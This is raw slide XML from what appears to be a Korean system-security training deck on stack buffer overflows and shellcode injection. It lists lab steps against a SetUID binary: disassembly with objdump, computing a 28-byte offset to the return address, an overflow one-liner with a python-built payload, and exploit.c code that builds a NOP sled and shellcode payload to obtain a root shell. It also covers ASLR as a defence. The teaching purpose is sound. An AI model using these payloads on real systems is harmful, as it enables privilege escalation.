            <a:ext cx="4843690" cy="491774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7B8B31A-EFFF-45B0-9BAA-885DBA00D0F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6308677" y="1523070"/>
          <a:ext cx="4589304" cy="4840394"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4589304">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2128152829"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2291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260" marR="60260" marT="16660" marB="16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65321"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41222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ASLR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활성화되면 스택에 있는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tmp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변수의 주소가 실행시마다 변경됨을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영역의 주소는 바뀌지 않음을 확인할 수 있다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0260" marR="60260" marT="16660" marB="166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801801"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50179" name="_x564904520">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018268F2-EA4E-4654-AC73-9D03699D04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" b="886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6376307" y="2253456"/>
            <a:ext cx="2763947" cy="388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BAD6DB3-D844-4C5A-95C9-894E39AA1B0D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A21F91F-1DC3-4908-B966-1CB4DD16BCD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EF4009-4F0A-4E24-B8DD-1AF25D60AA3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" name="화살표: 오른쪽 15">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CB51EAB-7C62-4CB0-98D3-6CB1BA97D092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6787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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 변경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err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test 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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점 이용 공격 수행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 $(python -c 'print "A"*24+"\x35\x06\x40")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/>
              <a:t>※ /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B975456-1230-4EEF-9616-8DA77ABFA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86" y="1296225"/>
            <a:ext cx="4907534" cy="180733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1DB69B-C4ED-4FDF-8DE0-E8E414C60830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 계정으로 복귀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$ exit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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A08284D-650F-4B1A-A1F3-5EDBF3FD238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226DAED-DF29-4C7C-9638-4E9BB63E060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DEA2D6-0F3A-4B8B-AD25-4708E3D64A9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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5547EF7-E9FE-4EA6-BF78-076A8734565A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2157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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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쉘코드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실행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/stack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파일에는 스택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취약점이 존재한다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쉘 코드가 포함된 페이로드를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만드는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exploit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.c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루트 쉘을 획득하라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test / test123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디스어셈블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objdump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 intel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바이너리 파일 이름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 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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쉘코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주입 및 실행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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5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5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 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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95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이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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주입 공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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5.11, 32-bit)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2AB61B-0024-401E-B838-EF52D8D8BB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0915F6-E77C-4AF8-B5FA-3419167E891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B0AD85-FEC3-4365-A757-F8F8537D18C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4779363B-6B6A-444B-9500-99AD02B021B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7414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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –l stack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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stack.c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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점이 존재함을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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble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 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-d stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more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※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA8D715-5190-4363-ADE3-5ED45E7A1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" t="9793" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="547007" y="1325678"/>
            <a:ext cx="4953262" cy="394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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51745194-F882-49F5-84C8-35FB497B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7" y="2386554"/>
            <a:ext cx="5012436" cy="2804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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AC64D9-E07F-4522-A4F9-5985CFEB79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-30" b="50027"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285593" y="475692"/>
            <a:ext cx="4948464" cy="144291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388A016-BAFF-492D-AA4E-0F78C665F132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6319647" y="2189525"/>
          <a:ext cx="4532687" cy="4202566"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4532687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3992703851"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23356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516" marR="59516" marT="16454" marB="16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935082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="39592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bof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진입 시점의 스택 구조는 다음과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그러므로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buffer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버퍼의 크기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(24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바이트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더 긴 문자열을 넘기면 복귀 주소를 변경시킬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9516" marR="59516" marT="16454" marB="1645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348403"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47105" name="_x564888896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB31F6E-30A6-4412-BD4E-A74C36C72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948" y="2778157"/>
            <a:ext cx="3559973" cy="313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829A799-8B06-46A4-82F5-321CBE3BBB88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7A76B71-EAB6-407A-AF8A-E844ADFC790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856923-BDBB-4924-909E-1BED1969E78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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20157A6D-010D-4CF6-97F5-EAA085FA6A61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868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1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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>vi exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빌드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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>o exploit exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 이용한 페이로드 제작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$ ./exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>28</a:t>
            </a:r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7" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70E56183-D24B-467D-8876-01211AFE7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" b="1886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="520699" y="866624"/>
            <a:ext cx="4901983" cy="27020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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25CF1106-5283-424F-AF5B-97A01DDAC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7" t="4646" r="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="4311650"/>
            <a:ext cx="4925568" cy="51188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72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A24B75ED-6B35-4C94-AB13-3FC6A450DC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8" t="-277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550327" y="5334930"/>
            <a:ext cx="4929506" cy="7061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18F384F-0013-4CBA-BB0F-60762091DAD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6265233" y="493694"/>
          <a:ext cx="5475010" cy="4580825"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2486881">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2988129">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="574915489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="212013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147" marR="13147" marT="3635" marB="36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147" marR="13147" marT="3635" marB="36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84636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="43398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먼저 페이로드를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채운다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memset (&amp; buffer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0x90, 517); //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nop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147" marR="13147" marT="3635" marB="36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effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.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effectLst/>
                        </a:rPr>
                        <a:t>복귀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.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effectLst/>
                        </a:rPr>
                        <a:t>즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>다음과 같은 페이로드가 준비된다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((long *)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(buffer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+ off)) = (long)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(buffer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+ off + 4);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lvl="0" indent="-17145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147" marR="13147" marT="3635" marB="36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631132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD6738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029" y="1876626"/>
            <a:ext cx="2298877" cy="310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4" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB0302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636" y="1876626"/>
            <a:ext cx="2298877" cy="31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73B1750-BBDB-4A5D-932C-555DCB1F22C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912D2A2-974C-4D35-B0BA-0858CAC749C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7A27E9-BB2D-41E3-B51E-46BA51DF3FC4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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A077C7EA-A0C4-466B-8124-6B7D9EE6C4D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2824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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘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./stack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49CFF3B-8277-4780-B382-55D6783068EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2678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3147" marR="13147" marT="3635" marB="36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084636"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3756073"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effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다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memcpy (buffer + sizeof (buffer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 sizeof (shellcode), shellcode, sizeof (shellcode))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3147" marR="13147" marT="3635" marB="36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025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5EA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95" y="1396921"/>
            <a:ext cx="2277247" cy="307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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02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5" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="59056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AC1FD6-2A5F-46CF-AE10-D0CB522CC28D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 쉘을 획득한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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DC04FE9-5AA5-45D2-917E-75E7A4694F3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62520C4-69C6-43DC-B25D-3085BBC6C4AB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61F6CE-640E-4B4A-B452-4CB037E1E0C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화살표: 오른쪽 14">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E00A10-1226-4A04-B94C-84962153F971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0036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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6642C97-AE41-486C-BE08-8D12FAF98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4" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
